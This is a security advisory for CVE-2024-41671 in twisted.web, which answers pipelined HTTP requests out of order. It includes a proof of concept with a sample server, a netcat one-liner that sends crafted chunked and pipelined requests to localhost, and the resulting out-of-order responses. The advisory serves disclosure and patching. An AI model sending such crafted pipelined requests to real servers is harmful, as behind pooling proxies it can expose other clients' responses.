GHSA-c8m8-j448-xjx7

Source

https://github.com/advisories/GHSA-c8m8-j448-xjx7

Import Source

https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/07/GHSA-c8m8-j448-xjx7/GHSA-c8m8-j448-xjx7.json

JSON Data

https://api.osv.dev/v1/vulns/GHSA-c8m8-j448-xjx7

Aliases

CVE-2024-41671

Published

2024-07-29T16:33:11Z

Modified

2024-07-29T16:56:56.788143Z

Severity

8.3 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L CVSS Calculator
6.9 (Medium) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:L/SI:L/SA:L CVSS Calculator

Summary

twisted.web has disordered HTTP pipeline response

Details

Summary

The HTTP 1.0 and 1.1 server provided by twisted.web could process pipelined HTTP requests out-of-order, possibly resulting in information disclosure.

PoC

Start a fresh Debian container:

docker run --workdir /repro --rm -it debian:bookworm-slim

Install twisted and its dependencies:

apt -y update && apt -y install ncat git python3 python3-pip \
    && git clone --recurse-submodules https://github.com/twisted/twisted \
    && cd twisted \
    && pip3 install --break-system-packages .

Run a twisted.web HTTP server that echos received requests' methods. e.g., the following:

from twisted.web import server, resource
from twisted.internet import reactor

class TheResource(resource.Resource):
    isLeaf = True

    def render_GET(self, request) -> bytes:
        return b"GET"

    def render_POST(self, request) -> bytes:
        return b"POST"

site = server.Site(TheResource())
reactor.listenTCP(80, site)
reactor.run()

Send it a POST request with a chunked message body, pipelined with another POST request, wait a second, then send a GET request on the same connection:

(printf 'POST / HTTP/1.1\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nPOST / HTTP/1.1\r\nContent-Length: 0\r\n\r\n'; sleep 1; printf 'GET / HTTP/1.1\r\n\r\n'; sleep 1) | nc localhost 80

Observe that the responses arrive out of order:

HTTP/1.1 200 OK
Server: TwistedWeb/24.3.0.post0
Date: Tue, 09 Jul 2024 06:19:41 GMT
Content-Length: 5
Content-Type: text/html

POST
HTTP/1.1 200 OK
Server: TwistedWeb/24.3.0.post0
Date: Tue, 09 Jul 2024 06:19:42 GMT
Content-Length: 4
Content-Type: text/html

GET
HTTP/1.1 200 OK
Server: TwistedWeb/24.3.0.post0
Date: Tue, 09 Jul 2024 06:19:42 GMT
Content-Length: 5
Content-Type: text/html

POST

Impact

See GHSA-xc8x-vp79-p3wm. Further, for instances of twisted.web HTTP servers deployed behind reverse proxies that implement connection pooling, it may be possible for remote attackers to receive responses intended for other clients of the twisted.web server.

References

Affected packages

PyPI / twisted

Package

Name: twisted; View open source insights on deps.dev
Purl: pkg:pypi/twisted

Affected ranges

Type: ECOSYSTEM
Events: Introduced

0Unknown introduced version / All previous versions are affected

Fixed

24.7.0rc1

Affected versions

1.*

1.0.1

1.0.3

1.0.4

1.0.5

1.0.6

1.0.7

1.1.0

1.1.1

1.2.0

2.*

2.1.0

2.4.0

2.5.0

8.*

8.0.0

8.0.1

8.1.0

8.2.0

9.*

9.0.0

10.*

10.0.0

10.1.0

10.2.0

11.*

11.0.0

11.1.0

12.*

12.0.0

12.1.0

12.2.0

12.3.0

13.*

13.0.0

13.1.0

13.2.0

14.*

14.0.0

14.0.1

14.0.2

15.*

15.0.0

15.1.0

15.2.0

15.2.1

15.3.0

15.4.0

15.5.0

16.*

16.0.0

16.1.0

16.1.1

16.2.0

16.3.0

16.3.1

16.3.2

16.4.0

16.4.1

16.5.0rc1

16.5.0rc2

16.5.0

16.6.0rc1

16.6.0

16.7.0rc1

16.7.0rc2

17.*

17.1.0rc1

17.1.0

17.5.0

17.9.0rc1

17.9.0

18.*

18.4.0rc1

18.4.0

18.7.0rc1

18.7.0rc2

18.7.0

18.9.0rc1

18.9.0

19.*

19.2.0rc1

19.2.0rc2

19.2.0

19.2.1

19.7.0rc1

19.7.0

19.10.0rc1

19.10.0

20.*

20.3.0rc1

20.3.0

21.*

21.2.0rc1

21.2.0

21.7.0rc1

21.7.0rc2

21.7.0rc3

21.7.0

22.*

22.1.0rc1

22.1.0

22.2.0rc1

22.2.0

22.4.0rc1

22.4.0

22.8.0rc1

22.8.0

22.10.0rc1

22.10.0

23.*

23.8.0rc1

23.8.0

23.10.0rc1

23.10.0

24.*

24.2.0rc1

24.3.0

Database specific

{
    "last_known_affected_version_range": "<= 24.3.0"
}